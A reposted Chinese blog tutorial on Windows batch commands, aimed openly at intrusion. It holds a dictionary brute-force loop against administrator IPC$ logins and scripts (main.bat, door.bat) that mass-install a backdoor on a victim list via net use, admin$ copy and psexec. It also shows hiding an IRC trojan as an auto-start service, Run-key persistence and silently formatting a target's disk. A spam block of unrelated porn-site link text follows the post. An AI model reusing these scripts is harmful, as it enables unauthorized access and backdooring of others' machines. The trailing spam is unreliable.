<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    posts - 297,  comments - 1618,  trackbacks - 0
    原文出處:http://raymin.bokee.com/5277973.html

    .簡單批處理內部命令簡介
    1.Echo
    命令
    打開回顯或關閉請求回顯功能,或顯示消息。如果沒有任何參數,echo 命令將顯示當前回顯設置。

     
    語法
    echo [{on│off}] [message]
    Sample:@echo off / echo hello world
    在實際應用中我們會把這條命令和重定向符號(也稱為管道符號,一般用> >> ^)結合來實現輸入一些命令到特定格式的文件中.這將在以后的例子中體現出來。

    2.@ 命令
    表示不顯示@后面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對方看到你使用的命令啦

    Sample:@echo off
    @echo Now initializing the program,please wait a minite...
    @format X: /q/u/autoset (format
    這個命令是不可以使用/y這個參數的,可喜的是微軟留了個autoset這個參數給我們,效果和/y是一樣的。)

    3.Goto 命令
    指定跳轉到標簽,找到標簽后,程序將處理從下一行開始的命令。

    語法:goto label label是參數,指定所要轉向的批處理程序中的行。)

    Sample

    if {%1}=={} goto noparms
    if {%2}=={} goto noparms
    (如果這里的if%1%2就是表示變量。)

    @Rem check parameters if null show usage
    :noparms
    echo Usage: monitor.bat ServerIP PortNumber
    goto end
     
    標簽的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標簽,
    :開頭的字符行, 在批處理中都被視作標號, 而直接忽略其后的所有內容, 只是為了與正常的標號相區別, 建議使用 goto 所無法識別的標號, 即在 :后緊跟一個非字母數字的一個特殊符號.goto命令就是根據這個:來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會理解你的意圖啊。

    4.Rem 命令
    注釋命令,起一個注釋的作用,便于別人閱讀和你自己日后修改。

    Rem Message
    Sample:@Rem Here is the description.

    5.Pause 命令
    運行 Pause 命令時,將顯示下面的消息:

    Press any key to continue . . .
    Sample

    @echo off
    :begin
    copy a:*.* d
    \back
    echo Please put a new disk into driver A
    pause
    goto begin
    在這個例子中,驅動器 A 中磁盤上的所有文件均復制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅動器 A 時,pause 命令會使程序掛起,以便您更換磁盤,然后按任意鍵繼續處理。

    6.Call 命令
    從一個批處理程序調用另一個批處理程序,并且不終止父批處理程序。call 命令接受用作調用目標的標簽。如果在腳本或批處理文件外使用 Call,它將不會在命令行起作用。

    語法

    call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
    參數

    [Drive:}[Path] FileName
    指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat .cmd 擴展名。

    7.start 命令
    調用外部程序,所有的DOS命令和命令行程序都可以由start命令來調用。

    入侵常用參數:

    MIN
    開始時窗口最小化

    SEPARATE
    在分開的空間內開始 16 Windows 程序

    HIGH
    HIGH 優先級類別開始應用程序

    REALTIME
    REALTIME 優先級類別開始應用程序

    WAIT
    啟動應用程序并等候它結束

    parameters
    這些為傳送到命令/程序的參數

    執行的應用程序是 32- GUI 應用程序時,CMD.EXE 不等應用程序終止就返回命令提示。如果在命令腳本內執行,該新行為則不會發生。


    8.choice
    命令

    choice
    使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:后應寫提示可輸入的字符,之間無空格。它的返回碼為
    1234......
    : choice /c:dme defrag,mem,end
    將顯示

    defrag,mem,end[D,M,E]?
    Sample

    Sample.bat
    的內容如下
    :
    @echo off
    choice /c:dme defrag,mem,end
    if errorlevel 3 goto defrag
    (應先判斷數值最高的錯誤碼)

    if errorlevel 2 goto mem
    if errotlevel 1 goto end

    :defrag
    c:\dos\defrag
    goto end
    :mem
    mem
    goto end
    :end
    echo good bye

    此文件運行后,將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ,然后if語句將作出判斷,d表示執行標號為defrag的程序段,m表示執行標號為mem的程序段,e表示執行標號為end的程序段,每個程序段最后都以goto end將程序跳到end標號處,然后程序將顯示good bye,文件結束。

    9.If 命令

    if 表示將判斷是否符合規定的條件,從而決定執行不同的命令。 有三種格式:
    a
    if "參數" == "字符串"  待執行的命令

    參數如果等于指定的字符串,則條件成立,運行命令,否則運行下一句。(注意是兩個等號)

    if "%1"=="a" format a:
    if {%1}=={} goto noparms
    if {%2}=={} goto noparms

    bif exist 文件名  待執行的命令
    如果有指定的文件,則條件成立,運行命令,否則運行下一句。

    if exist config.sys edit config.sys

    cif errorlevel / if not errorlevel 數字 待執行的命令
    如果返回碼等于指定的數字,則條件成立,運行命令,否則運行下一句。

    if errorlevel 2 goto x2  

    DOS
    程序運行時都會返回一個數字給DOS,稱為錯誤碼errorlevel或稱返回碼,常見的返回碼為01

    10.for 命令
    for
    命令是一個比較復雜的命令,主要用于參數在指定的范圍內循環執行命令。

    在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable

    for {%variable│%%variable} in (set) do command [ CommandLineOptions]
    %variable
    指定一個單一字母可替換的參數。
    (set)
    指定一個或一組文件。可以使用通配符。

    command
    指定對每個文件執行的命令。

    command-parameters
    為特定命令指定參數或命令行開關。

    在批處理文件中使用 FOR 命令時,指定變量請使用
    %%variable
    而不要用 %variable。變量名稱是區分大小寫的,所以 %i 不同于 %I

    如果命令擴展名被啟用,下列額外的 FOR 命令格式會受到 支持:

    FOR /D %variable IN (set) DO command [command-parameters]

    如果集中包含通配符,則指定與目錄名匹配,而不與文件名匹配。

    FOR /R [[drive:]path] %variable IN (set) DO command [command-

    檢查以 [drive:]path 為根的目錄樹,指向每個目錄中的 FOR 語句。如果在 /R 后沒有指定目錄,則使用當前 目錄。如果集僅為一個單點(.)字符,則枚舉該目錄樹。

    FOR /L %variable IN (start,step,end) DO command [command-para

    該集表示以增量形式從開始到結束的一個數字序列。因此,(1,1,5) 將產生序列 1 2 3 4 5(5,-1,1) 將產生 序列 (5 4 3 2 1)

    FOR /F ["options"] %variable IN (file-set) DO command
    FOR /F ["options"] %variable IN ("string") DO command
    FOR /F ["options"] %variable IN ('command') DO command

    或者,如果有 usebackq 選項:

    FOR /F ["options"] %variable IN (file-set) DO command
    FOR /F ["options"] %variable IN ("string") DO command
    FOR /F ["options"] %variable IN ('command') DO command

    filenameset 為一個或多個文件名。繼續到 filenameset 中的 下一個文件之前,每份文件都已被打開、讀取并經過處理。 處理包括讀取文件,將其分成一行行的文字,然后將每行 解析成零或更多的符號。然后用已找到的符號字符串變量值調用 For 循環。以默認方式,/F 通過每個文件的每一行中分開的第一個空白符號。跳過空白行。您可通過指定可選 "options" 參數替代默認解析操作。這個帶引號的字符串包括一個或多個指定不同解析選項的關鍵字。這些關鍵字為:

    eol=c - 指一個行注釋字符的結尾(就一個)
    skip=n -
    指在文件開始時忽略的行數。

    delims=xxx -
    指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。

    tokens=x,y,m-n -
    指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的格式為一個范圍。通過 nth 符號指定 m 符號字符串中的最后一個字符星號, 那么額外的變量將在最后一個符號解析之分配并接受行的保留文本。

    usebackq -
    指定新語法已在下類情況中使用: 在作為命令執行一個后引號的字符串并且引號字符為文字字符串命令并允許在 fi中使用雙引號擴起文件名稱。
    sample1:
    FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

    會分析 myfile.txt 中的每一行,忽略以分號打頭的那些行,將 每行中的第二個和第三個符號傳遞給 for 程序體;用逗號和/或空格定界符號。請注意,這個 for 程序體的語句引用 %i 來取得第二個符號,引用 %j 來取得第三個符號,引用 %k 來取得第三個符號后的所有剩余符號。對于帶有空格的文件名,您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號,您還需要使用 usebackq 選項,否則,雙引號會被理解成是用作定義某個要分析的字符串的。

    %i 專門在 for 語句中得到說明,%j %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號,只要不試圖說明一個高于字母 'z' 'Z' 的變量。請記住,FOR 變量是單一字母、分大小寫和全局的;同時不能有 52 個以上都在使用中。

    您還可以在相鄰字符串上使用 FOR /F 分析邏輯;方法是,用單引號將括號之間的 filenameset 括起來。這樣,該字符串會被當作一個文件中的一個單一輸入行。

    最后,您可以用 FOR /F 命令來分析命令的輸出。方法是,將括號之間的 filenameset 變成一個反括字符串。該字符串會被當作命令行,傳遞到一個子 CMD.EXE,其輸出會被抓進內存,并被當作文件分析。因此,以下例子:

    FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

    會枚舉當前環境中的環境變量名稱。另外,FOR 變量參照的替換已被增強。您現在可以使用下列選項語法:

    ~I - 刪除任何引號("),擴充 %I
    %~fI -
    %I 擴充到一個完全合格的路徑名

    %~dI -
    僅將 %I 擴充到一個驅動器號

    %~pI -
    僅將 %I 擴充到一個路徑

    %~nI -
    僅將 %I 擴充到一個文件名

    %~xI -
    僅將 %I 擴充到一個文件擴展名

    %~sI -
    擴充的路徑只含有短名

    %~aI -
    %I 擴充到文件的文件屬性

    %~tI -
    %I 擴充到文件的日期/時間

    %~zI -
    %I 擴充到文件的大小

    %~$PATH:I -
    查找列在路徑環境變量的目錄,并將 %I 擴充到找到的第一個完全合格的名稱。如果環境變量未被定義,或者沒有找到文件,此組合鍵會擴充空字符串

    可以組合修飾符來得到多重結果:

    %~dpI - 僅將 %I 擴充到一個驅動器號和路徑
    %~nxI -
    僅將 %I 擴充到一個文件名和擴展名

    %~fsI -
    僅將 %I 擴充到一個帶有短名的完整路徑名

    %~dp$PATH:i -
    查找列在路徑環境變量的目錄,并將 %I 擴充到找到的第一個驅動器號和路徑。

    %~ftzaI -
    %I 擴充到類似輸出線路的 DIR

    在以上例子中,%I PATH 可用其他有效數值代替。%~ 語法用一個有效的 FOR 變量名終止。選取類似 %I 的大寫變量名比較易讀,而且避免與不分大小寫的組合鍵混淆。

    以上是MS的官方幫助,下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。

    sample2

    利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。
    我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接,當成功時記下密碼。

    最主要的命令是一條:
    for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
    i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 命令來連接。然后將程序運行結果傳遞給find命令--
    for /f i%% in (dict.txt) do net use
    \\ip\ipc$ "i%%" /u:"administrator"│find ":
    命令成功完成">>D:\ok.txt ,這樣就ko了。

    sample3

    你有沒有過手里有大量肉雞等著你去種后門+木馬呢?,當數量特別多的時候,原本很開心的一件事都會變得很郁悶:)。文章開頭就談到使用批處理文件,可以簡化日常或重復性任務。那么如何實現呢?呵呵,看下去你就會明白了。

    主要命令也只有一條:(在批處理文件中使用 FOR 命令時,指定變量使用 %%variable
    @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
    tokens
    的用法請參見上面的sample1,在這里它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k

    cultivate.bat無非就是用net use命令來建立IPC$連接,并copy木馬+后門到victim,然后用返回碼(If errorlever =)來篩選成功種植后門的主機,并echo出來,或者echo到指定的文件。

    delims=
    表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什么樣的了。應該根據%%i %%j %%k表示的對象來排列,一般就是 ip password username

    代碼雛形:

    --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
    @echo off
    @if "%1"=="" goto usage
    @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
    @goto end
    :usage
    @echo run this batch in dos modle.or just double-click it.
    :end
    --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

    ------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
    @net use
    \\%1\ipc$ %3 /u:"%2"
    @if errorlevel 1 goto failed
    @echo Trying to establish the IPC$ connection ............OK
    @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
    @p*** ec
    \\%1 c:\winnt\system32\windrv32.exe
    @p*** ec
    \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
    :failed
    @echo Sorry can not connected to the victim.
    ----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
    這只是一個自動種植后門批處理的雛形,兩個批處理和后門程序(Windrv32.exe,PSexec.exe需放在統一目錄下.批處理內容
    尚可擴展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.

    .如何在批處理文件中使用參數
    批處理中可以使用參數,一般從1% 9%這九個,當有多個參數時需要用shift來移動,這種情況并不多見,我們就不考慮它了。

    sample1
    fomat.bat
    @echo off
    if "%1"=="a" format a:
    :format
    @format a:/q/u/auotset
    @echo please insert another disk to driver A.
    @pause
    @goto fomat
    這個例子用于連續地格式化幾張軟盤,所以用的時候需在dos窗口輸入fomat.bat a,呵呵,好像有點畫蛇添足了~

    sample2

    當我們要建立一個IPC$連接地時候總要輸入一大串命令,弄不好就打錯了,所以我們不如把一些固定命令寫入一個批處理,把肉雞地ip password username 當著參數來賦給這個批處理,這樣就不用每次都打命令了。

    @echo off
    @net use
    \\1%\ipc$ "2%" /u:"3%"
    注意哦,這里PASSWORD是第二個參數。
    @if errorlevel 1 echo connection failed
    怎么樣,使用參數還是比較簡單的吧?你這么帥一定學會了
    .No.3
    .如何使用組合命令(Compound Command)

    1.&

    Usage:第一條命令 & 第二條命令 [& 第三條命令...]

    用這種方法可以同時執行多條命令,而不管命令是否執行成功

    Sample
    C:\>dir z: & dir c:\Ex4rch
    The system cannot find the path specified.
    Volume in drive C has no label.
    Volume Serial Number is 0078-59FB

    Directory of c:\Ex4rch

    2002-05-14 23:51 .
    2002-05-14 23:51 ..
    2002-05-14 23:51 14 sometips.gif

    2.&&

    Usage:第一條命令 && 第二條命令 [&& 第三條命令...]

    用這種方法可以同時執行多條命令,當碰到執行出錯的命令后將不執行后面的命令,如果一直沒有出錯則一直執行完所有命令;

    Sample
    C:\>dir z: && dir c:\Ex4rch
    The system cannot find the path specified.

    C:\>dir c:\Ex4rch && dir z:
    Volume in drive C has no label.
    Volume Serial Number is 0078-59FB

    Directory of c:\Ex4rch

    2002-05-14 23:55 .
    2002-05-14 23:55 ..
    2002-05-14 23:55 14 sometips.gif
    1 File(s) 14 bytes
    2 Dir(s) 768,671,744 bytes free
    The system cannot find the path specified.

    在做備份的時候可能會用到這種命令會比較簡單,如:
    dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb E:\backup
    如果遠程服務器上存在backup.mdb文件,就執行copy命令,若不存在該文件則不執行copy命令。這種用法可以替換IF exist了 :)

    3.││

    Usage:第一條命令 ││ 第二條命令 [││ 第三條命令...]

    用這種方法可以同時執行多條命令,當碰到執行正確的命令后將不執行后面的命令,如果沒有出現正確的命令則一直執行完所有命令;

    Sample
    C:\Ex4rch>dir sometips.gif ││ del sometips.gif
    Volume in drive C has no label.
    Volume Serial Number is 0078-59FB

    Directory of C:\Ex4rch

    2002-05-14 23:55 14 sometips.gif
    1 File(s) 14 bytes
    0 Dir(s) 768,696,320 bytes free

    組合命令使用的例子:
    sample

    @copy trojan.exe
    \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt

    四、管道命令的使用

    1.│ 命令
    Usage
    :第一條命令第二條命令 [│ 第三條命令
    ...]
    將第一條命令的結果作為第二條命令的參數來使用,記得在unix中這種方式很常見。

    sample
    time /t>>D:\IP.log
    netstat -n -p tcp│find ":3389">>D:\IP.log
    start Explorer
    看出來了么?用于終端服務允許我們為用戶自定義起始的程序,來實現讓用戶運行下面這個bat,以獲得登錄用戶的IP

    2.>>>輸出重定向命令
    將一條命令或某個程序輸出結果的重定向到特定文件中, > >>的區別在于,>會清除調原有文件中的內容后寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。

    sample1
    echo hello world>c:\hello.txt (stupid example?)

    sample2:
    時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那里鉆,DLL馬也不例外,針對這一點我們可以在安裝好系統和必要的應用程序后,對該目錄下的EXEDLL文件作一個記錄:
    運行CMD--轉換目錄到
    system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
    這樣所有的EXEDLL文件的名稱都被分別記錄到exeback.txtdllback.txt
    ,
    日后如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了
    .
    這時我們用同樣的命令將system32下的EXEDLL文件記錄到另外的exeback1.txtdllback1.txt,然后運行
    :
    CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(
    FC命令比較前后兩次的DLLEXE文件,并將結果輸入到diff.txt),這樣我們就能發現一些多出來的DLLEXE文件,然后通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒有是最好,如果有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將后門DLL文件注銷掉,再把它移到回收站里,若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。

    3.< >& <&
    <
    從文件中而不是從鍵盤中讀入命令輸入。

    >&
    將一個句柄的輸出寫入到另一個句柄的輸入中。

    <&
    從一個句柄讀取輸入并將其寫入到另一個句柄輸出中。

    這些并不常用,也就不多做介紹。

    No.5
    .如何用批處理文件來操作注冊表

    在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的,例如:為了達到隱藏后門、木馬程序而刪除Run下殘余的鍵值。或者創建一個服務用以加載后門。當然我們也會修改注冊表來加固系統或者改變系統的某個屬性,這些都需要我們對注冊表操作有一定的了解。下面我們就先學習一下如何使用.REG文件來操作注冊表.(我們可以用批處理來生成一個REG文件)
    關于注冊表的操作,常見的是創建、修改、刪除。

    1.創建
    創建分為兩種,一種是創建子項(Subkey)

    我們創建一個文件,內容如下:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

    然后執行該腳本,你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創建了一個名字為"hacker"的子項。

    另一種是創建一個項目名稱
    那這種文件格式就是典型的文件格式,和你從注冊表中導出的文件格式一致,內容如下:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Invader"="Ex4rch"
    "Door"=C:\\WINNT\\system32\\door.exe
    "Autodos"=dword:02

    這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    新建了:Invaderdoorabout這三個項目

    Invader
    的類型是
    "String value"
    door
    的類型是
    "REG SZ value"
    Autodos
    的類型是"DWORD value"

    2.修改
    修改相對來說比較簡單,只要把你需要修改的項目導出,然后用記事本進行修改,然后導入(regedit /s)即可。

    3.刪除
    我們首先來說說刪除一個項目名稱,我們創建一個如下的文件:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Ex4rch"=-

    執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了;

    我們再看看刪除一個子項,我們創建一個如下的腳本:

    Windows Registry Editor Version 5.00

    [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

    執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經被刪除了。

    相信看到這里,.reg文件你基本已經掌握了。那么現在的目標就是用批處理來創建特定內容的.reg文件了,記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件。

    samlpe1:如上面的那個例子,如想生成如下注冊表文件
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Invader"="Ex4rch"
    "door"=hex:255
    "Autodos"=dword:000000128
    只需要這樣:
    @echo Windows Registry Editor Version 5.00>>Sample.reg

    @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
    @echo "Invader"="Ex4rch">>Sample.reg
    @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
    @echo "Autodos"=dword:02>>Sample.reg

    samlpe2:
    我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(RunonceRunservicesRunexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe)
    @start windrv32.exe
    @attrib +h +r windrv32.exe
    @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
    @echo "windsnx "=- >>patch.dll
    @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
    @regedit /s patch.dll
    @delete patch.dll

    @REM [刪除DSNXDE在注冊表中的啟動項,用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀,并config為自啟動]
    @REM
    這樣不是更安全.


    posted on 2007-06-21 11:07 阿蜜果 閱讀(1090) 評論(2)  編輯  收藏 所屬分類: Other


    FeedBack:
    # re: [轉]批處理命令集錦
    2007-06-25 00:23 | JAVA-HE
    詳細,哪天用到。就來這里查了。呵呵,謝謝姐姐分享。  回復  更多評論
      
    # re: [轉]批處理命令集錦
    2007-07-12 19:01 | Scott.Pan
    amigo對批處理的命令掌握的這么熟練啊,哎,我就是不會記得這些命令,其實還沒深入使用Linux,更不談在linux平臺上開發了,哈哈~~~~得學!有好的資料拿出來分享,期待ing!  回復  更多評論
      
    <2007年6月>
    272829303112
    3456789
    10111213141516
    17181920212223
    24252627282930
    1234567

          生活將我們磨圓,是為了讓我們滾得更遠——“圓”來如此。
          我的作品:
          玩轉Axure RP  (2015年12月出版)
          

          Power Designer系統分析與建模實戰  (2015年7月出版)
          
         Struts2+Hibernate3+Spring2   (2010年5月出版)
         

    留言簿(263)

    隨筆分類

    隨筆檔案

    文章分類

    相冊

    關注blog

    積分與排名

    • 積分 - 2294288
    • 排名 - 3

    最新評論

    閱讀排行榜

    評論排行榜

    主站蜘蛛池模板: 69视频免费观看l| 四虎永久在线免费观看| 亚洲日韩中文字幕一区| 免费va人成视频网站全| 热re99久久6国产精品免费| 亚洲妇女无套内射精| 亚洲AV无码一区二区三区DV | 特级做A爰片毛片免费看无码| 久久精品国产亚洲精品2020| 精品剧情v国产在免费线观看| 9i9精品国产免费久久| 亚洲综合一区国产精品| 国产亚洲精品一品区99热| 午夜免费福利影院| 波多野结衣免费一区视频| 国产午夜亚洲精品不卡免下载| 亚洲黄色在线电影| 亚洲美女在线国产| 在线成人a毛片免费播放| 免费日本一区二区| 老司机午夜精品视频在线观看免费| 亚洲精品午夜久久久伊人| 伊人婷婷综合缴情亚洲五月| 成人a视频片在线观看免费| 日韩精品内射视频免费观看 | 香蕉蕉亚亚洲aav综合| 亚洲狠狠爱综合影院婷婷| 最近最好的中文字幕2019免费| 久久久久国产精品免费看| 成人特级毛片69免费观看| 亚洲色大成网站www永久男同 | 亚洲av日韩aⅴ无码色老头| 亚洲男人天堂影院| 亚洲A∨无码一区二区三区| 亚洲高清国产拍精品青青草原| 男女交性永久免费视频播放| 四虎免费影院ww4164h| 精品亚洲永久免费精品| 抽搐一进一出gif免费视频| 日本高清不卡中文字幕免费| 亚洲成av人在线观看网站 |